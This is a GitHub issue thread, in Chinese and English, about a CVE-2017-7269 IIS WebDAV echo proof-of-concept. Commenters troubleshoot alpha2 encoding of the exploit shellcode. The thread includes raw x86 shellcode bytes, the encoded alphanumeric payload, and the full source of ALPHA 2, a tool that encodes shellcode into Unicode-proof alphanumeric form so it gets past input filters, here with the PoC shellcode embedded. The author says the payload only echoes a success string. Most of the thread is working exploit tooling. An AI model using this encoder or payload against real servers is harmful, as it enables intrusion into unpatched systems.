payloads ?,about lcatro/cve-2017-7269-echo-poc

Comments (14)

lcatro commented on September 13, 2024 2

@b1ueb0y http://blog.csdn.net/instruder/article/details/6050048 用的是这个,据说不同版本的编译器好像结果有些出入,我的是VC++ 6 编译环境,另一哥们VS 2015 编出来的一直都不对..

from cve-2017-7269-echo-poc.

lcatro commented on September 13, 2024

This payloads is not command execute ,just check remote server vuln state and return a echo string ..

from cve-2017-7269-echo-poc.

g0rx commented on September 13, 2024

i know , i can you use payloads ? or you fails ?

from cve-2017-7269-echo-poc.

go-spider commented on September 13, 2024

"\xCC\x64\x8B\x0D\x18\x00\x00\x00\x8B\x49\x04\x81\xE9\x40\x03\x00\x00\x8B\x09\x8B\x01\x8B\x80\xA0\x00\x00\x00\x51\x68\xC8\x00\x00\x00\xE8\x00\x00\x00\x00\x5E\x8B\xFE\x83\xC7\x11\x57\x6A\x0D\x83\xC7\x0E\x57\x6A\x54\xFF\xD0CVE-2017-7269\0Content-Type: text/html\r\nContent-Length:26 \r\n\r\nHHIT CVE-2017-7269 Success\0"
alpha2转过来和你转的不一样，为何？？
VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBA

from cve-2017-7269-echo-poc.

g0rx commented on September 13, 2024

do you have skype ?

from cve-2017-7269-echo-poc.

lcatro commented on September 13, 2024

@g0rx Yes ,of couse .I havn't skype ..

from cve-2017-7269-echo-poc.

lcatro commented on September 13, 2024

@b1ueb0y 我转的命令是alpha2 --nocompress --unicode --uppercase esi ..

from cve-2017-7269-echo-poc.

g0rx commented on September 13, 2024

give me ur skype

from cve-2017-7269-echo-poc.

go-spider commented on September 13, 2024

@lcatro 转出来就是和你的不一样

// sc_alpha2.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"

int strcasecmp (const char * __sz1, const char * __sz2)
{return _stricmp (__sz1, __sz2);}

/*
________________________________________________________________________________

,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.
SS"  Y$P"  SY"  ,SY
iS"   dY       ,sS"   Unicode-proof uppercase alphanumeric shellcode encoding.
YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.
`"YSS""S" "SSSSSSSP   <>
________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA  02111-1307
USA.

Acknowledgements:
Thanks to rix for his phrack article on aphanumeric shellcode.
Thanks to obscou for his phrack article on unicode-proof shellcode.
Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
Thanks to spoonm for inspiration and suggestions, check out his 1337 perl
conversion of ALPHA in the metasploit framework (with polymorphism!)
*/

#define mixedcase_w32sehgetpc           "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36" \
										"FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc           "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" \
										"P5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618" \
										"16"
#define mixedcase_ascii_decoder_body    "AkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN"
#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" \
										"BXP8ACJJI"
#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" \
										"IAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" \
										"ZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" \
										"AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" \
										"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB3" \
										"0APB944JB"
/*
#define mixedcase_w32sehgetpc           "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36" \
	"FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc           "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" \
	"P5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618" \
	"16"
#define mixedcase_ascii_decoder_body    "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" \
	"BXP8ACJJI"
#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" \
	"IAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" \
	"ZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" \
	"AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" \
	"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB3" \
	"0APB944JB"
*/
struct decoder {
	char* id; // id of option
	char* code; // the decoder
} mixedcase_ascii_decoders[] = {
	{ "nops",     "IIIIIIII" mixedcase_ascii_decoder_body },
	{ "eax",      "PYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "ecx",      "IIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "edx",      "JJJJJJJRY" mixedcase_ascii_decoder_body },
	{ "ebx",      "SYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "esp",      "TYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "ebp",      "UYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "esi",      "VYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "edi",      "WYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "[esp-10]", "LLLLLLLLTLLLLYQZ" mixedcase_ascii_decoder_body },
	{ "[esp-C]",  "LLLLLLLLLLLLY7QZ" mixedcase_ascii_decoder_body },
	{ "[esp-8]",  "LLLLLLLLYII7QZ" mixedcase_ascii_decoder_body },
	{ "[esp-4]",  "LLLLYIIII7QZ" mixedcase_ascii_decoder_body },
	{ "[esp]",    "YIIIIII7QZ" mixedcase_ascii_decoder_body },
	{ "[esp+4]",  "YYIIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "[esp+8]",  "YYYIIIII7QZ" mixedcase_ascii_decoder_body },
	{ "[esp+C]",  "YYYYIIIIIQZ" mixedcase_ascii_decoder_body },
	{ "[esp+10]", "YYYYYIIII7QZ" mixedcase_ascii_decoder_body },
	{ "[esp+14]", "YYYYYYIIIIQZ" mixedcase_ascii_decoder_body },
	{ "[esp+18]", "YYYYYYYIII7QZ" mixedcase_ascii_decoder_body },
	{ "[esp+1C]", "YYYYYYYYIIIQZ" mixedcase_ascii_decoder_body },
	{ "seh",      mixedcase_w32sehgetpc "IIIIIIIQZ" // ecx code
	mixedcase_ascii_decoder_body },
	{ NULL, NULL }
}, uppercase_ascii_decoders[] = {
	{ "nops",     "IIIIIIIIIIII" uppercase_ascii_decoder_body },
	{ "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
	{ "ebx",      "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "esp",      "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "ebp",      "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "esi",      "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "edi",      "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
	{ "[esp-C]",  "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
	{ "[esp-8]",  "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
	{ "[esp-4]",  "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "[esp]",    "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
	{ "[esp+4]",  "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "[esp+8]",  "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
	{ "[esp+C]",  "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
	{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
	{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
	{ "seh",      uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
	uppercase_ascii_decoder_body },
	{ NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = {
	{ "nops",     "7777777777777777" mixedcase_ascii_decoder_body },
	{ "eax",      "PY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "ecx",      "77777777777777QZ" mixedcase_ascii_decoder_body },
	{ "edx",      "77777777777777RY" mixedcase_ascii_decoder_body },
	{ "ebx",      "SY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "esp",      "TY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "ebp",      "UY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "esi",      "VY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "edi",      "WY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp-10]", "LLLLLLLLTLLLLYQZ" mixedcase_ascii_decoder_body },
	{ "[esp-C]",  "LLLLLLLLLLLLY7QZ" mixedcase_ascii_decoder_body },
	{ "[esp-8]",  "LLLLLLLLY77777QZ" mixedcase_ascii_decoder_body },
	{ "[esp-4]",  "LLLL7Y77777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp]",    "Y7777777777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+4]",  "YY777777777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+8]",  "YYY77777777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+C]",  "YYYY7777777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+10]", "YYYYY777777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+14]", "YYYYYY77777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+18]", "YYYYYYY7777777QZ" mixedcase_ascii_decoder_body },
	{ "[esp+1C]", "YYYYYYYY777777QZ" mixedcase_ascii_decoder_body },
	{ "seh",      mixedcase_w32sehgetpc "77777777777777QZ" // ecx code
	mixedcase_ascii_decoder_body },
	{ NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = {
	{ "nops",     "777777777777777777777777" uppercase_ascii_decoder_body },
	{ "eax",      "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "ecx",      "7777777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "edx",      "7777777777777777777777RY" uppercase_ascii_decoder_body },
	{ "ebx",      "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "esp",      "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "ebp",      "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "esi",      "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "edi",      "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
	{ "[esp-C]",  "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp-8]",  "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp-4]",  "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp]",    "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+4]",  "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+8]",  "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+C]",  "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
	{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
	{ "seh",      uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
	uppercase_ascii_decoder_body },
	{ NULL, NULL }
}, mixedcase_unicode_decoders[] = {
	{ "nops",     "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
	{ "eax",      "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "ecx",      "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
	{ "edx",      "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "ebx",      "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "esp",      "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "ebp",      "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "esi",      "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "edi",      "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ "[esp]",    "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
	{ "[esp+4]",  "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
	{ NULL, NULL }
}, uppercase_unicode_decoders[] = {
	{ "nops",     "IAIAIAIA4444" uppercase_unicode_decoder_body },
	{ "eax",      "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "ecx",      "IAIAIAIA4444" uppercase_unicode_decoder_body },
	{ "edx",      "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "ebx",      "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "esp",      "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "ebp",      "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "esi",      "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "edi",      "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ "[esp]",    "YAIAIAIAIA44" uppercase_unicode_decoder_body },
	{ "[esp+4]",  "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
	{ NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = {
	{ "nops",     "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "eax",      "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "ecx",      "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "edx",      "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "ebx",      "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "esp",      "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "ebp",      "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "esi",      "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "edi",      "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "[esp]",    "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ "[esp+4]",  "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
	{ NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = {
	{ "nops",     "44444444444444" uppercase_unicode_decoder_body },
	{ "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },
	{ "ecx",      "44444444444444" uppercase_unicode_decoder_body },
	{ "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },
	{ "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },
	{ "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },
	{ "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },
	{ "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },
	{ "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },
	{ "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },
	{ "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },
	{ NULL, NULL }
};

struct decoder* decoders[] = {
	mixedcase_ascii_decoders, uppercase_ascii_decoders,
	mixedcase_unicode_decoders, uppercase_unicode_decoders,
	mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,
	mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders
};
void version(void) {
	printf("a2 blah blah blah...\n");
	exit(EXIT_SUCCESS);
}

void help(char* name) {
	printf(
		"Usage: %s [OPTION] [BASEADDRESS]\n"
		"ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.\n"
		"The result can optionaly be uppercase-only and/or unicode proof. It is a encoded\n"
		"version of your origional shellcode. It consists of baseaddress-code with some\n"
		"padding, a decoder routine and the encoded origional shellcode. This will work\n"
		"for any target OS. The resulting shellcode needs to have RWE-access to modify\n"
		"it`s own code and decode the origional shellcode in memory.\n"
		"\n"
		"BASEADDRESS\n"
		"  The decoder routine needs have it`s baseaddress in specified register(s). The\n"
		"  baseaddress-code copies the baseaddress from the given register or stack\n"
		"  location into the apropriate registers.\n"
		"eax, ecx, edx, ebx, esp, ebp, esi, edi\n"
		"  Take the baseaddress from the given register. (Unicode baseaddress code using\n"
		"  esp will overwrite the byte of memory pointed to by ebp!)\n"
		"[esp], [esp-X], [esp+X]\n"
		"  Take the baseaddress from the stack.\n"
		"seh\n"
		"  The windows \"Structured Exception Handler\" (seh) can be used to calculate\n"
		"  the baseaddress automatically on win32 systems. This option is not available\n"
		"  for unicode-proof shellcodes and the uppercase version isn`t 100% reliable.\n"
		"nops\n"
		"  No baseaddress-code, just padding.  If you need to get the baseaddress from a\n"
		"  source not on the list use this option (combined with --nocompress) and\n"
		"  replace the nops with your own code. The ascii decoder needs the baseaddress\n"
		"  in registers ecx and edx, the unicode-proof decoder only in ecx.\n"
		"-n\n"
		"  Do not output a trailing newline after the shellcode.\n"
		"--nocompress\n"
		"  The baseaddress-code uses \"dec\"-instructions to lower the required padding\n"
		"  length. The unicode-proof code will overwrite some bytes in front of the\n"
		"  shellcode as a result. Use this option if you do not want the \"dec\"-s.\n"
		"--unicode\n"
		"  Make shellcode unicode-proof. This means it will only work when it gets\n"
		"  converted to unicode (inserting a \"0\" after each byte) before it gets\n"
		"  executed.\n"
		"--uppercase\n"
		"  Make shellcode 100%% uppercase characters, uses a few more bytes then\n"
		"  mixedcase shellcodes.\n"
		"--sources\n"
		"  Output a list of BASEADDRESS options for the given combination of --uppercase\n"
		"  and --unicode.\n"
		"--help\n"
		"  Display this help and exit\n"
		"--version\n"
		"  Output version information and exit\n"
		"\n"
		"See the source-files for further details and copying conditions. There is NO\n"
		"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
		"\n"
		"Acknowledgements:\n"
		"  Thanks to rix for his phrack article on aphanumeric shellcode.\n"
		"  Thanks to obscou for his phrack article on unicode-proof shellcode.\n"
		"  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"
		"\n"
		"Report bugs to <[email protected]>\n",
		name
		);
	exit(EXIT_SUCCESS);
}

//-----------------------------------------------------------------------------
int main(int argc, char* argv[], char* envp[]) {
	int   uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,
		nonewline = 0, nocompress = 0, options = 0, spaces = 0;
	char* baseaddress = NULL;
	int   i, input, A, B, C, D, E, F;
	char* valid_chars;

	// Random seed
	//struct timeval tv;
	//struct timezone tz;
	//gettimeofday(&tv, &tz);
	//srand((int)tv.tv_sec*1000+tv.tv_usec);
	srand((unsigned int)GetTickCount());
	// Scan all the options and set internal variables accordingly
	for (i=1; i<argc; i++) {
		if (strcmp(argv[i], "--help") == 0) help(argv[0]);
		else if (strcmp(argv[i], "--version") == 0) version();
		else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
		else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
		else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
		else if (strcmp(argv[i], "--sources") == 0) sources = 1;
		else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
		else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
		else if (baseaddress == NULL) baseaddress = argv[i];
		else {
			fprintf(stderr, "%s: more then one BASEADDRESS option: `%s\" and `%s\"\n"
				"Try `%s --help\" for more information.\n",
				argv[0], baseaddress, argv[i], argv[0]);
			exit(EXIT_FAILURE);
		}
	}

	// No baseaddress option ?
	if (baseaddress == NULL) {
		fprintf(stderr, "%s: missing BASEADDRESS options.\n"
			"Try `%s --help\" for more information.\n", argv[0], argv[0]);
		exit(EXIT_FAILURE);
	}
	// The uppercase, unicode and nocompress option determine which decoder we"ll
	// need to use. For each combination of these options there is an array,
	// indexed by the baseaddress with decoders. Pointers to these arrays have
	// been put in another array, we can calculate the index into this second
	// array like this:
	options = uppercase+unicode*2+nocompress*4;
	// decoders[options] will now point to an array of decoders for the specified
	// options. The array contains one decoder for every possible baseaddress.

	// Someone wants to know which baseaddress options the specified options
	// for uppercase, unicode and/or nocompress allow:
	if (sources) {
		printf("Available options for %s%s alphanumeric shellcode:\n",
			uppercase ? "uppercase" : "mixedcase",
			unicode ? " unicode-proof" : "");
		for (i=0; decoders[options][i].id != NULL; i++) {
			printf("  %s\n", decoders[options][i].id);
		}
		printf("\n");
		exit(EXIT_SUCCESS);
	}

	if (uppercase) {
		if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
		else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
	} else {
		if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
		else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
	}

	// Find and output decoder
	for (i=0; strcasecmp(baseaddress, decoders[options][i].id) != 0; i++) {
		if (decoders[options][i+1].id == NULL) {
			fprintf(stderr, "%s: unrecognized baseaddress option `%s\"\n"
				"Try `%s %s%s--sources\" for a list of BASEADDRESS options.\n",
				argv[0], baseaddress, argv[0],
				uppercase ? "--uppercase " : "",
				unicode ? "--unicode " : "");
			exit(EXIT_FAILURE);
		}
	}
	printf("%s", decoders[options][i].code);

	// read, encode and output shellcode
	//  while ((input = getchar()) != EOF) {
	//这里添加shellcode
	unsigned char shellcode[] = 
	//	"\x33\xc9\x51\x68\x20\x79\x6f\x75"
//		"\x68\x66\x75\x63\x6b\x8d\x14\x24"
	//	"\x51\x52\x52\x51\xb9\x98\x80\xe1"
//		"\x77\xff\xd1\xb9\x1a\xe0\xe6\x77"
//		"\x50\xff\xd1"
	/*	"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
		"\x49\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41"
		"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
		"\x42\x75\x4A\x49\x76\x55\x76\x50\x54\x78\x30\x42\x61\x53\x74\x71"
		"\x30\x35\x46\x58\x37\x50\x34\x4A\x68\x65\x6C\x6C\x6F\x2C\x77\x6F"
		"\x72\x6C\x64\x21\x00"*/
		"\xCC\x64\x8B\x0D\x18\x00\x00\x00\x8B\x49\x04\x81\xE9\x40\x03\x00\x00\x8B\x09\x8B\x01\x8B\x80\xA0\x00\x00\x00\x51\x68\xC8\x00\x00\x00\xE8\x00\x00\x00\x00\x5E\x8B\xFE\x83\xC7\x11\x57\x6A\x0D\x83\xC7\x0E\x57\x6A\x54\xFF\xD0"
		"CVE-2017-7269\0Content-Type: text/html\r\nContent-Length:26 \r\n\r\nHHIT CVE-2017-7269 Success\0";
	for (int j=0;j<sizeof(shellcode);j++) {
		
		// encoding AB -> CD 00 EF 00
		input=shellcode[j];
		A = (input & 0xf0) >> 4;
		B = (input & 0x0f);

		F = B;
		// E is arbitrary as long as EF is a valid character
		i = rand() % strlen(valid_chars);
		while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
		E = valid_chars[i] >> 4;
		// normal code uses xor, unicode-proof uses ADD.
		// AB ->
		D =  unicode ? (A-E) & 0x0f : (A^E);
		// C is arbitrary as long as CD is a valid character
		i = rand() % strlen(valid_chars);
		while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
		C = valid_chars[i] >> 4;
		printf("%c%c", (C<<4)+D, (E<<4)+F);
	}
	printf("A%s", nonewline ? "" : "\n"); // Terminating "A"

	return EXIT_SUCCESS;
}

from cve-2017-7269-echo-poc.

lcatro commented on September 13, 2024

@g0rx China no Shype ,lets we talk at this ..

from cve-2017-7269-echo-poc.

lcatro commented on September 13, 2024

@b1ueb0y 这个编译成功之后还需要执行刚才发给你的命令,alpha2 就是编译出来的程序路径,后面就是参数..

from cve-2017-7269-echo-poc.

go-spider commented on September 13, 2024

@lcatro 参数加了的，转出来结果就是不一样，能提供下你转换的代码吗？

from cve-2017-7269-echo-poc.

g0rx commented on September 13, 2024

lcatro do u hvave jabber ?

from cve-2017-7269-echo-poc.

go-spider commented on September 13, 2024

@lcatro 我是vs2010，真坑．．．Ｏ（∩＿∩）Ｏ～vc++ 6编译出来也不同，已放弃．．．

from cve-2017-7269-echo-poc.

payloads ? about cve-2017-7269-echo-poc HOT 14 OPEN

Comments (14)

Related Issues (4)

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent